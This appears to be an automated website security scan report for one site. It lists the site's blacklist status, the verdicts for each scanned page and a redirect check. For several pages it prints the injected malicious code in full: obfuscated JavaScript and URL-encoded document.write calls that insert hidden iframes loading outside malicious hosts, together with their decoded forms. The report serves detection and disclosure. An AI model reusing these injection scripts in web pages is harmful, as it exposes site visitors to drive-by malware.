Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=embodiedimagination.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://embodiedimagination.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.embodiedimagination.com/ | 200 OK Content-Length: 8410 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0xec39=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x3F\x74\x72\x66\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xec39[1]](_0xec39[0]);document[_0xec39[1]](_0xec39[2]); Decoded script: var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var VxYa="PGlmcmFtZSBzcmM9Imh0dHA6Ly8yZ2VzaWNodGVyLmNvbS9vay5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var Fu8Y="";var yYkX,mVyN,CZrD,cjBs,q1EF,TP0c,ghDn="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;VxYa=VxYa.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{cjBs=k0e0y0S.indexOf(VxYa.charAt(i++));q1EF=k0e0y0S.indexOf(VxYa.charAt(i++));TP0c=k0e0y0S.indexOf(VxYa.charAt(i++));ghDn=k0e0y0S.indexOf <iframe src="http://2gesichter.com/ok.php" width="0" height="0" frameborder="0"></iframe> Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://blog.ponosmechty.esy.es/file/otk.php <iframe src="http://blog.ponosmechty.esy.es/file/otk.php" width="0" height="0"> | ||
http://www.embodiedimagination.com/index.htm | 200 OK Content-Length: 8410 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0xec39=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x3F\x74\x72\x66\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xec39[1]](_0xec39[0]);document[_0xec39[1]](_0xec39[2]); Decoded script: var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var VxYa="PGlmcmFtZSBzcmM9Imh0dHA6Ly8yZ2VzaWNodGVyLmNvbS9vay5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var Fu8Y="";var yYkX,mVyN,CZrD,cjBs,q1EF,TP0c,ghDn="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;VxYa=VxYa.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{cjBs=k0e0y0S.indexOf(VxYa.charAt(i++));q1EF=k0e0y0S.indexOf(VxYa.charAt(i++));TP0c=k0e0y0S.indexOf(VxYa.charAt(i++));ghDn=k0e0y0S.indexOf <iframe src="http://2gesichter.com/ok.php" width="0" height="0" frameborder="0"></iframe> Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://blog.ponosmechty.esy.es/file/otk.php <iframe src="http://blog.ponosmechty.esy.es/file/otk.php" width="0" height="0"> | ||
http://www.embodiedimagination.com/foundingmembers.htm | 200 OK Content-Length: 8297 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://blog.ponosmechty.esy.es/file/otk.php <iframe src="http://blog.ponosmechty.esy.es/file/otk.php" width="0" height="0"> | ||
http://www.embodiedimagination.com/thesociety.htm | 200 OK Content-Length: 10857 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0xec39=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x3F\x74\x72\x66\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xec39[1]](_0xec39[0]);document[_0xec39[1]](_0xec39[2]); Decoded script: var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var VxYa="PGlmcmFtZSBzcmM9Imh0dHA6Ly8yZ2VzaWNodGVyLmNvbS9vay5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var Fu8Y="";var yYkX,mVyN,CZrD,cjBs,q1EF,TP0c,ghDn="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;VxYa=VxYa.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{cjBs=k0e0y0S.indexOf(VxYa.charAt(i++));q1EF=k0e0y0S.indexOf(VxYa.charAt(i++));TP0c=k0e0y0S.indexOf(VxYa.charAt(i++));ghDn=k0e0y0S.indexOf <iframe src="http://2gesichter.com/ok.php" width="0" height="0" frameborder="0"></iframe> Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://blog.ponosmechty.esy.es/file/otk.php <iframe src="http://blog.ponosmechty.esy.es/file/otk.php" width="0" height="0"> | ||
http://www.embodiedimagination.com/linksofinterest.htm | 200 OK Content-Length: 9801 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- HTML Encryption provided by iWEBTOOL.com --> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%6C%6F%76%65%70%70%74%2E%63%6E%2F%6C%6E%6B%2E%70%68%70%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%2F%69%66%72%61%6D%65%3E')); Decoded script: <iframe src="http://iloveppt.cn/lnk.php" width="1" height="1"></iframe> Antivirus reports:
| ||
http://cleantds.in/coupe.php | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://cleantds.in/test404page.js | 500 Can't connect to cleantds.in:80 Content-Length: 186 Content-Type: text/plain | clean |
https://count.carrierzone.com/app/count_server/count.js | 200 OK Content-Length: 36029 Content-Type: text/javascript | clean |
http://www.embodiedimagination.com/contactus.htm | 200 OK Content-Length: 8068 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- HTML Encryption provided by iWEBTOOL.com --> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%6C%6F%76%65%70%70%74%2E%63%6E%2F%6C%6E%6B%2E%70%68%70%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%2F%69%66%72%61%6D%65%3E')); Decoded script: <iframe src="http://iloveppt.cn/lnk.php" width="1" height="1"></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: embodiedimagination.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: embodiedimagination.com
Referer: http://www.google.com/search?q=embodiedimagination.com
Result:
The result is similar to the first query. There are no suspicious redirects found.